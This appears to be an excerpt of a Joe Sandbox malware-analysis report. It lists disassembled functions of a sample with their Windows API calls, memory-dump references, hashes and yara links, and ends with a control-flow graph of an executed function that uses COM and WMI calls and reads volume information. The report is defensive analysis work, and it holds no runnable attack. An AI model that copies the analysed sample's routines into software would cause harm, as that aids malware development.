                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                    • Opcode ID: 74fcd919893de4488af59598964df1654c761b519eb2dc63cc83a711d707a320
                                                                                                                                                                    • Instruction ID: 7b743afd5cef2b6a333a84733aff3be990cc54cbea73287647ea48e1b73a2d04
                                                                                                                                                                    • Opcode Fuzzy Hash: 74fcd919893de4488af59598964df1654c761b519eb2dc63cc83a711d707a320
                                                                                                                                                                    • Instruction Fuzzy Hash: 7851EE76605602BFDF29AF50D845BBAB7B6EF15310F28412DE8469B291E731ED40CBB0
                                                                                                                                                                    Function 00DA3537 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00D9E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D9FDE8,?,00000000,-00000008), ref: 00D9E6A2
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00DA359B
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00DA35A2
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00DA35DC
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00DA35E3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1913693674-0
                                                                                                                                                                    • Opcode ID: 29a3e421c98e93e87d895a0e3a79c4aa7f74031ecd25c8bb4aa91b34994d1488
                                                                                                                                                                    • Instruction ID: fbd97174dac727df6435932dabf7a4a67879270219471b5857f1e44c0d0c0e5d
                                                                                                                                                                    • Opcode Fuzzy Hash: 29a3e421c98e93e87d895a0e3a79c4aa7f74031ecd25c8bb4aa91b34994d1488
                                                                                                                                                                    • Instruction Fuzzy Hash: D721D771A05705AFDF20AF6D984182ABBAAFF423647044519F86587601EB30EF009BB1
                                                                                                                                                                    Function 00D98042 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 92b1b0013eeba220840f9d29028ff0f7df398490723d5963fe2aa363fdc1752b
                                                                                                                                                                    • Instruction ID: 88b60f8432ceabacaa32422f5f8f96e36455df98095e4e255eb2d7a36f8826ac
                                                                                                                                                                    • Opcode Fuzzy Hash: 92b1b0013eeba220840f9d29028ff0f7df398490723d5963fe2aa363fdc1752b
                                                                                                                                                                    • Instruction Fuzzy Hash: 2421A232204705AFDF20AF65CC8196B77A9FF427647144529F869D7251EF31EC40A7B1
                                                                                                                                                                    Function 00DA484F Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00DA4857
                                                                                                                                                                      • Part of subcall function 00D9E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D9FDE8,?,00000000,-00000008), ref: 00D9E6A2
                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DA488F
                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DA48AF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 158306478-0
                                                                                                                                                                    • Opcode ID: 788d5ed5c1e26de51698589751bb2fcdd41e1268489310ce5f4e06c4498a6b5f
                                                                                                                                                                    • Instruction ID: 08ac7e8ec3773e2c6ee5f6d89f2152b3acb13907e51e46af6727a18f8872dd31
                                                                                                                                                                    • Opcode Fuzzy Hash: 788d5ed5c1e26de51698589751bb2fcdd41e1268489310ce5f4e06c4498a6b5f
                                                                                                                                                                    • Instruction Fuzzy Hash: 951126F6506265BFAF1567B5AC8EC7F7E5CDEC63943140924F401D1201FAA8DE1096B0
                                                                                                                                                                    Function 00D9457B Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 00D94582
                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00D9458C
                                                                                                                                                                      • Part of subcall function 00D924C2: std::_Lockit::_Lockit.LIBCPMT ref: 00D924DE
                                                                                                                                                                      • Part of subcall function 00D924C2: std::_Lockit::~_Lockit.LIBCPMT ref: 00D924F7
                                                                                                                                                                    • codecvt.LIBCPMT ref: 00D945C6
                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00D945FD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3716348337-0
                                                                                                                                                                    • Opcode ID: 0a1a8ffdeaa6a8d32354e845e554e5c9e6ea8f597429c1ede87ad10694a93fe2
                                                                                                                                                                    • Instruction ID: e9a201987d440737410b2034793656abf6aff9bf68c36d3bd053b0c6720eef60
                                                                                                                                                                    • Opcode Fuzzy Hash: 0a1a8ffdeaa6a8d32354e845e554e5c9e6ea8f597429c1ede87ad10694a93fe2
                                                                                                                                                                    • Instruction Fuzzy Hash: AC01C076900215EBCF05EBA4D816ABD7771FF54310F250649E411AB392CF74DE0287B1
                                                                                                                                                                    Function 00DAA4E0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00DA9B0F,00000000,00000001,00000000,?,?,00DA5A1F,?,00000000,00000000), ref: 00DAA4F7
                                                                                                                                                                    • GetLastError.KERNEL32(?,00DA9B0F,00000000,00000001,00000000,?,?,00DA5A1F,?,00000000,00000000,?,?,?,00DA5365,00000000), ref: 00DAA503
                                                                                                                                                                      • Part of subcall function 00DAA554: CloseHandle.KERNEL32(FFFFFFFE,00DAA513,?,00DA9B0F,00000000,00000001,00000000,?,?,00DA5A1F,?,00000000,00000000,?,?), ref: 00DAA564
                                                                                                                                                                    • ___initconout.LIBCMT ref: 00DAA513
                                                                                                                                                                      • Part of subcall function 00DAA535: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00DAA4D1,00DA9AFC,?,?,00DA5A1F,?,00000000,00000000,?), ref: 00DAA548
                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00DA9B0F,00000000,00000001,00000000,?,?,00DA5A1F,?,00000000,00000000,?), ref: 00DAA528
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                                    • Opcode ID: 4d7e874283c6cb95504f8bf581d25cdc5bdada817fc289e0122a5855aae9175c
                                                                                                                                                                    • Instruction ID: add9ab68d8668fab1e3e94fca5245432b0b84d2ac2d725a73ec4eac4c7c0f831
                                                                                                                                                                    • Opcode Fuzzy Hash: 4d7e874283c6cb95504f8bf581d25cdc5bdada817fc289e0122a5855aae9175c
                                                                                                                                                                    • Instruction Fuzzy Hash: FBF01C36410215FFCF221F99EC0899A3F66FB893A0B044610FA09D5220D736C920EBB5
                                                                                                                                                                    Function 00D959A7 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00D959B9
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00D959C8
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00D959D1
                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00D959DE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                    • Opcode ID: 4a9b54fca138cafb6b6d8c9d38896437e5ff24efe60468286345231e53ce9bab
                                                                                                                                                                    • Instruction ID: 3fd048d42cf9ee68bdd65980b4d8e58cfd0c0168de7e04e0b3f084327d96ac03
                                                                                                                                                                    • Opcode Fuzzy Hash: 4a9b54fca138cafb6b6d8c9d38896437e5ff24efe60468286345231e53ce9bab
                                                                                                                                                                    • Instruction Fuzzy Hash: 67F05F74D1120DEBCF00DBB5D94999EBBF4FF1C204BA14696A412E7210E670AB449F60
                                                                                                                                                                    Function 00DA2117 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00D9E783: GetLastError.KERNEL32(00000000,?,00DA0AB9), ref: 00D9E787
                                                                                                                                                                      • Part of subcall function 00D9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00D9B9D2), ref: 00D9E829
                                                                                                                                                                    • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00D99266,?,?,?,00000055,?,-00000050,?,?,?), ref: 00DA21D6
                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00D99266,?,?,?,00000055,?,-00000050,?,?), ref: 00DA220D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CodePageValid
                                                                                                                                                                    • String ID: utf8
                                                                                                                                                                    • API String ID: 943130320-905460609
                                                                                                                                                                    • Opcode ID: e193e41e2489775307f43a87395b7cd3fca473ebc8a7e00e15412f560fca1d1e
                                                                                                                                                                    • Instruction ID: ae5c7949594f4b5f91830840888e88716b847d0af1bf09dae64c2a1ed74c6bd6
                                                                                                                                                                    • Opcode Fuzzy Hash: e193e41e2489775307f43a87395b7cd3fca473ebc8a7e00e15412f560fca1d1e
                                                                                                                                                                    • Instruction Fuzzy Hash: 4051E671644301EADF25AB7E8C82BB773A8EF47700F180429FA45DB581FA74E9408675
                                                                                                                                                                    Function 00D9DFAC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D9DEAD,?,?,00000000,00000000,00000000,?), ref: 00D9DFD1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EncodePointer
                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                    • API String ID: 2118026453-2084237596
                                                                                                                                                                    • Opcode ID: f6ee3d78a1637faf90d6eea1adf571552f88f8e76d93e165afb9615b2020703c
                                                                                                                                                                    • Instruction ID: 22e8dbb331995a9d2da1c6b2ab6a9d8e557ac5470c7d096f90a95562f24a1754
                                                                                                                                                                    • Opcode Fuzzy Hash: f6ee3d78a1637faf90d6eea1adf571552f88f8e76d93e165afb9615b2020703c
                                                                                                                                                                    • Instruction Fuzzy Hash: FF415971900209AFCF26DF98DC81AEEBBB5FF48304F188169FA08A7255D3759990DB60
                                                                                                                                                                    Function 00D9D818 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00D9DA8F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ___except_validate_context_record
                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                    • API String ID: 3493665558-3733052814
                                                                                                                                                                    • Opcode ID: 102419de9211abfb084bc55a2ca7d810a826553bdee12a52da6912b64ccd897f
                                                                                                                                                                    • Instruction ID: 878f8de9f1826f3df382ec91e20c660a05cfaff18b1a30096e379777f80fadfd
                                                                                                                                                                    • Opcode Fuzzy Hash: 102419de9211abfb084bc55a2ca7d810a826553bdee12a52da6912b64ccd897f
                                                                                                                                                                    • Instruction Fuzzy Hash: 1331C136504218EBCF229F94CC409AA7B77FF09369F2D425AF8544A221C332DCA1DBB1
                                                                                                                                                                    Function 00D929D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(00DB648C,ios_base::badbit set,?,?,00D91C84,00DB6478,00D91B17), ref: 00D929DF
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(00DB648C,?,?,00D91C84,00DB6478,00D91B17), ref: 00D92A19
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000008.00000002.2963553100.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 00000008.00000002.2963536212.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963574658.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963693510.0000000000DB5000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963724025.0000000000DB6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963758068.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963789427.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 00000008.00000002.2963818457.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_8_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                    • String ID: ios_base::badbit set
                                                                                                                                                                    • API String ID: 17069307-3882152299
                                                                                                                                                                    • Opcode ID: a5862076fc80e25f9d75d48df8f1c01409170cc107e4bed4779628d8748a3d8d
                                                                                                                                                                    • Instruction ID: 46873b7ec34e5f07ac608a7d075049dcf663c17c6794b1f2c3ddbe76d0868410
                                                                                                                                                                    • Opcode Fuzzy Hash: a5862076fc80e25f9d75d48df8f1c01409170cc107e4bed4779628d8748a3d8d
                                                                                                                                                                    • Instruction Fuzzy Hash: 90F08231600600EFCB249F18D844A757B68FB45734F14032EE896833E0C7355842DE71

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 004361F0 Relevance: 28.6, APIs: 11, Strings: 5, Instructions: 598memorycomCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 0 4361f0-43620f 1 436210-436224 0->1 1->1 2 436226-436237 1->2 3 436240-436265 2->3 3->3 4 436267-4362a7 3->4 5 4362b0-4362c5 4->5 5->5 6 4362c7-4362de 5->6 8 436397-4363a2 6->8 9 4362e4-4362ef 6->9 11 4363b0-4363e9 8->11 10 4362f0-43631f 9->10 10->10 12 436321-436334 10->12 11->11 13 4363eb-43643f CoCreateInstance 11->13 14 436340-43638b 12->14 15 436445-436476 13->15 16 4367df-43680b call 43c410 GetVolumeInformationW 13->16 14->14 18 43638d-436392 14->18 19 436480-436494 15->19 22 436815-436817 16->22 23 43680d-436811 16->23 18->8 19->19 20 436496-4364c1 SysAllocString 19->20 26 4364c7-4364e1 CoSetProxyBlanket 20->26 27 4367ce-4367db SysFreeString 20->27 25 43682d-436834 22->25 23->22 28 436840-43685f 25->28 29 436836-43683d 25->29 31 4364e7-4364ff 26->31 32 4367c4-4367ca 26->32 27->16 30 436860-436879 28->30 29->28 30->30 33 43687b-4368aa 30->33 34 436500-43651c 31->34 32->27 35 4368b0-4368f1 33->35 34->34 36 43651e-43659f SysAllocString 34->36 35->35 37 4368f3-43691f call 41d970 35->37 38 4365a0-4365b9 36->38 42 436920-436928 37->42 38->38 40 4365bb-4365e4 SysAllocString 38->40 45 4367b2-4367c2 SysFreeString * 2 40->45 46 4365ea-43660c 40->46 42->42 44 43692a-43692c 42->44 47 436932-436942 call 4081b0 44->47 48 436820-436827 44->48 45->32 53 436612-436615 46->53 54 4367a8-4367ae 46->54 47->48 48->25 50 436947-43694e 48->50 53->54 55 43661b-436620 53->55 54->45 55->54 56 436626-436673 VariantInit 55->56 57 436680-4366b5 56->57 57->57 58 4366b7-4366cc 57->58 59 4366d0-4366d2 58->59 60 436793-4367a4 VariantClear 59->60 61 4366d8-4366de 59->61 60->54 61->60 62 4366e4-4366f1 61->62 63 4366f3-4366f8 62->63 64 43672d 62->64 67 43670c-436710 63->67 66 43672f-436756 call 408000 call 408eb0 64->66 78 436758 66->78 79 43675d-436769 66->79 69 436712-43671b 67->69 70 436700 67->70 73 436722-436726 69->73 74 43671d-436720 69->74 72 436701-43670a 70->72 72->66 72->67 73->72 76 436728-43672b 73->76 74->72 76->72 78->79 80 436770-436790 call 